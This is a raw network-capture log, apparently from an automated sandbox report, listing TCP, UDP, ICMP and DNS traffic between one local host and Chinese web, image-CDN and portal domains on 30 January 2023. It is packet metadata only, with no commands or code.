                      Jan 30, 2023 07:40:20.215071917 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.215079069 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.215142965 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.215589046 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.215636969 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.215682983 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.215698004 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.216484070 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.216531992 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.216572046 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.216577053 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.216638088 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.217367887 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.217417002 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.217463017 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.217477083 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.218194008 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.218240976 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.218267918 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.218290091 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.218369961 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.219106913 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.219155073 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.219201088 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.219218969 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.219923019 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.219969988 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.219996929 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.220014095 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.220069885 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.220789909 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.220841885 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.220885992 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.220920086 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.221638918 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.221687078 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.221708059 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.221733093 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.221786022 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.222538948 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.222800016 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.222845078 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.222862005 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.222891092 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.222945929 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.223701954 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.223747969 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.223797083 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.223810911 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.224509001 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.224555016 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.224587917 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.224622011 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.224701881 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.225409031 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.225491047 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.225537062 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.225553989 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.226249933 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.226296902 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.226340055 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.226341963 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.226399899 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.227123022 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.227169991 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.227216959 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.227233887 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.228005886 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.228053093 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.228107929 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.234967947 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.235033035 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.235083103 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.235090017 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.235145092 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.235739946 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.235789061 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.235855103 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.236244917 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.236293077 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.236325026 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.236623049 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.237035990 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.237081051 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.237111092 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.237126112 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.237185001 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.237760067 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.237807035 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.237854004 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.237867117 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.238542080 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.238589048 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.238614082 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.238636971 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.238694906 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.239336014 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.239532948 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.239629984 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.240714073 CET4971480192.168.2.3185.10.104.115
                      Jan 30, 2023 07:40:20.260505915 CET8049714185.10.104.115192.168.2.3
                      Jan 30, 2023 07:40:20.282358885 CET8049713104.193.88.112192.168.2.3
                      Jan 30, 2023 07:40:20.346085072 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:20.346144915 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:20.346247911 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.034326077 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.034392118 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:21.141364098 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:21.141537905 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.144252062 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.144289017 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:21.145040035 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:21.198040962 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.462522984 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.462522984 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.462579966 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:21.463022947 CET4434971579.133.177.216192.168.2.3
                      Jan 30, 2023 07:40:21.463092089 CET49715443192.168.2.379.133.177.216
                      Jan 30, 2023 07:40:21.735421896 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:21.735497952 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:21.735599041 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:21.736115932 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:21.736145020 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:21.834330082 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:21.834614992 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:21.846751928 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:21.846808910 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:21.847170115 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:21.901161909 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:22.849235058 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:22.849303007 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:22.849361897 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:22.849759102 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:22.849845886 CET4434971679.133.177.211192.168.2.3
                      Jan 30, 2023 07:40:22.849863052 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:22.849905014 CET49716443192.168.2.379.133.177.211
                      Jan 30, 2023 07:40:23.013712883 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.013778925 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.013947010 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.015587091 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.015624046 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.112143040 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.112507105 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.119204998 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.119244099 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.119908094 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.167241096 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.869138956 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.869177103 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.869239092 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.869909048 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.869988918 CET4434971779.133.177.214192.168.2.3
                      Jan 30, 2023 07:40:23.869990110 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:23.870151997 CET49717443192.168.2.379.133.177.214
                      Jan 30, 2023 07:40:24.220793962 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.220835924 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.220922947 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.221582890 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.221604109 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.318149090 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.318279028 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.322382927 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.322400093 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.323239088 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.370246887 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.625262022 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.625329018 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.625358105 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.625977039 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.626055956 CET4434971879.133.177.218192.168.2.3
                      Jan 30, 2023 07:40:24.626091003 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:24.626147032 CET49718443192.168.2.379.133.177.218
                      Jan 30, 2023 07:40:25.252090931 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.252161026 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.252276897 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.252568007 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.252594948 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.349590063 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.350137949 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.352601051 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.352638960 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.353133917 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.401493073 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.885057926 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.885128975 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.885157108 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.885871887 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.885956049 CET4434971979.133.177.215192.168.2.3
                      Jan 30, 2023 07:40:25.885977030 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:40:25.886012077 CET49719443192.168.2.379.133.177.215
                      Jan 30, 2023 07:41:51.878572941 CET4970510100192.168.2.3103.86.67.66
                      Jan 30, 2023 07:41:52.089657068 CET1010049705103.86.67.66192.168.2.3
                      Jan 30, 2023 07:41:52.089867115 CET4970510100192.168.2.3103.86.67.66

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 30, 2023 07:40:01.956288099 CET5892153192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:02.947030067 CET5892153192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:03.962863922 CET5892153192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:06.009882927 CET5892153192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:06.973474979 CET53589218.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:07.966860056 CET53589218.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:08.049611092 CET4997753192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:08.223875046 CET53499778.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:08.980637074 CET53589218.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:10.799201012 CET5784053192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:10.817279100 CET53578408.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:11.030025959 CET53589218.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:11.253972054 CET5799053192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:12.080869913 CET53579908.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:12.463543892 CET5238753192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:13.274435043 CET53523878.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:13.858237982 CET5692453192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:14.649996042 CET53569248.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:15.035599947 CET6062553192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:15.858453035 CET53606258.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:17.378496885 CET4930253192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:17.924500942 CET53493028.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:18.008702040 CET5397553192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:18.597928047 CET53539758.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:18.678886890 CET5113953192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:18.699131012 CET53511398.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:18.908432007 CET5295553192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:19.756649971 CET53529558.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:20.135263920 CET6058253192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:20.152762890 CET53605828.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:20.322169065 CET5713453192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:20.344877958 CET53571348.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:21.708236933 CET6205053192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:21.728574991 CET53620508.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:22.978579044 CET5604253192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:23.011231899 CET53560428.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:24.105391979 CET5963653192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:24.215467930 CET53596368.8.8.8192.168.2.3
                      Jan 30, 2023 07:40:24.994689941 CET5563853192.168.2.38.8.8.8
                      Jan 30, 2023 07:40:25.250333071 CET53556388.8.8.8192.168.2.3

                      ICMP Packets

                      TimestampSource IPDest IPChecksumCodeType
                      Jan 30, 2023 07:40:07.967144966 CET192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                      Jan 30, 2023 07:40:08.980931044 CET192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                      Jan 30, 2023 07:40:11.030236959 CET192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 30, 2023 07:40:01.956288099 CET192.168.2.38.8.8.80x2bc9Standard query (0)gmt.yunliao8.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:02.947030067 CET192.168.2.38.8.8.80x2bc9Standard query (0)gmt.yunliao8.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:03.962863922 CET192.168.2.38.8.8.80x2bc9Standard query (0)gmt.yunliao8.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:06.009882927 CET192.168.2.38.8.8.80x2bc9Standard query (0)gmt.yunliao8.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:08.049611092 CET192.168.2.38.8.8.80x62ccStandard query (0)8awang.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:10.799201012 CET192.168.2.38.8.8.80xa776Standard query (0)41ku.cnA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:11.253972054 CET192.168.2.38.8.8.80xf4c3Standard query (0)pic.rmb.bdstatic.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:12.463543892 CET192.168.2.38.8.8.80x165fStandard query (0)imgsrc.baidu.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:13.858237982 CET192.168.2.38.8.8.80xe19cStandard query (0)pic.rmb.bdstatic.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:15.035599947 CET192.168.2.38.8.8.80x3dd0Standard query (0)imgsrc.baidu.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:17.378496885 CET192.168.2.38.8.8.80x39feStandard query (0)pic.rmb.bdstatic.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.008702040 CET192.168.2.38.8.8.80xac8fStandard query (0)imgsrc.baidu.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.678886890 CET192.168.2.38.8.8.80x61e2Standard query (0)41ku.cnA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.908432007 CET192.168.2.38.8.8.80xdbfeStandard query (0)pic.rmb.bdstatic.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.135263920 CET192.168.2.38.8.8.80xff35Standard query (0)pic.rmb.bdstatic.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:20.322169065 CET192.168.2.38.8.8.80x8eb5Standard query (0)www.2345.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:21.708236933 CET192.168.2.38.8.8.80x6406Standard query (0)www.2345.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:22.978579044 CET192.168.2.38.8.8.80x3ae4Standard query (0)www.2345.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.105391979 CET192.168.2.38.8.8.80x4233Standard query (0)www.2345.comA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:24.994689941 CET192.168.2.38.8.8.80xbec1Standard query (0)www.2345.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 30, 2023 07:40:06.973474979 CET8.8.8.8192.168.2.30x2bc9Server failure (2)gmt.yunliao8.comnonenoneA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:07.966860056 CET8.8.8.8192.168.2.30x2bc9Server failure (2)gmt.yunliao8.comnonenoneA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:08.223875046 CET8.8.8.8192.168.2.30x62ccNo error (0)8awang.com103.224.212.220A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:08.980637074 CET8.8.8.8192.168.2.30x2bc9Server failure (2)gmt.yunliao8.comnonenoneA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:10.817279100 CET8.8.8.8192.168.2.30xa776No error (0)41ku.cn103.86.67.66A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:10.817279100 CET8.8.8.8192.168.2.30xa776No error (0)41ku.cn45.125.217.58A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:10.817279100 CET8.8.8.8192.168.2.30xa776No error (0)41ku.cn103.86.67.98A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:10.817279100 CET8.8.8.8192.168.2.30xa776No error (0)41ku.cn103.86.65.194A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:11.030025959 CET8.8.8.8192.168.2.30x2bc9Server failure (2)gmt.yunliao8.comnonenoneA (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:12.080869913 CET8.8.8.8192.168.2.30xf4c3No error (0)pic.rmb.bdstatic.compic.rmb.bdstatic.com.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:12.080869913 CET8.8.8.8192.168.2.30xf4c3No error (0)pic.rmb.bdstatic.com.a.bdydns.comopencdnpicrmb.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:12.080869913 CET8.8.8.8192.168.2.30xf4c3No error (0)opencdnpicrmb.jomodns.comopencdnpicrmb.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:12.080869913 CET8.8.8.8192.168.2.30xf4c3No error (0)opencdnpicrmb.gshifen.com104.193.88.112A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:12.080869913 CET8.8.8.8192.168.2.30xf4c3No error (0)opencdnpicrmb.gshifen.com104.193.90.80A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:13.274435043 CET8.8.8.8192.168.2.30x165fNo error (0)imgsrc.baidu.comhiphotos.baidu.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:13.274435043 CET8.8.8.8192.168.2.30x165fNo error (0)hiphotos.baidu.comhiphotos.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:13.274435043 CET8.8.8.8192.168.2.30x165fNo error (0)hiphotos.jomodns.comhiphotos.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:13.274435043 CET8.8.8.8192.168.2.30x165fNo error (0)hiphotos.gshifen.com104.193.88.109A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:14.649996042 CET8.8.8.8192.168.2.30xe19cNo error (0)pic.rmb.bdstatic.compic.rmb.bdstatic.com.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:14.649996042 CET8.8.8.8192.168.2.30xe19cNo error (0)pic.rmb.bdstatic.com.a.bdydns.comopencdnpicrmb.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:14.649996042 CET8.8.8.8192.168.2.30xe19cNo error (0)opencdnpicrmb.jomodns.comopencdnpicrmb.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:14.649996042 CET8.8.8.8192.168.2.30xe19cNo error (0)opencdnpicrmb.gshifen.com104.193.90.80A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:14.649996042 CET8.8.8.8192.168.2.30xe19cNo error (0)opencdnpicrmb.gshifen.com104.193.88.112A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:15.858453035 CET8.8.8.8192.168.2.30x3dd0No error (0)imgsrc.baidu.comhiphotos.baidu.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:15.858453035 CET8.8.8.8192.168.2.30x3dd0No error (0)hiphotos.baidu.comhiphotos.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:15.858453035 CET8.8.8.8192.168.2.30x3dd0No error (0)hiphotos.jomodns.comhiphotos.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:15.858453035 CET8.8.8.8192.168.2.30x3dd0No error (0)hiphotos.gshifen.com104.193.88.109A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:17.924500942 CET8.8.8.8192.168.2.30x39feNo error (0)pic.rmb.bdstatic.compic.rmb.bdstatic.com.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:17.924500942 CET8.8.8.8192.168.2.30x39feNo error (0)pic.rmb.bdstatic.com.a.bdydns.comopencdnpicrmb.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:17.924500942 CET8.8.8.8192.168.2.30x39feNo error (0)opencdnpicrmb.jomodns.comopencdnpicrmb.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:17.924500942 CET8.8.8.8192.168.2.30x39feNo error (0)opencdnpicrmb.gshifen.com185.10.104.115A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.597928047 CET8.8.8.8192.168.2.30xac8fNo error (0)imgsrc.baidu.comhiphotos.baidu.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:18.597928047 CET8.8.8.8192.168.2.30xac8fNo error (0)hiphotos.baidu.comhiphotos.jomodns.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:18.597928047 CET8.8.8.8192.168.2.30xac8fNo error (0)hiphotos.jomodns.comhiphotos.gshifen.comCNAME (Canonical name)IN (0x0001)false
                      Jan 30, 2023 07:40:18.597928047 CET8.8.8.8192.168.2.30xac8fNo error (0)hiphotos.gshifen.com185.10.104.120A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.699131012 CET8.8.8.8192.168.2.30x61e2No error (0)41ku.cn103.86.67.66A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.699131012 CET8.8.8.8192.168.2.30x61e2No error (0)41ku.cn45.125.217.58A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.699131012 CET8.8.8.8192.168.2.30x61e2No error (0)41ku.cn103.86.67.98A (IP address)IN (0x0001)false
                      Jan 30, 2023 07:40:18.699131012 CET8.8.8.8192.168.2.30x61e2No error (0)41ku.cn103.86.65.194A (IP address)IN (0x0001)false
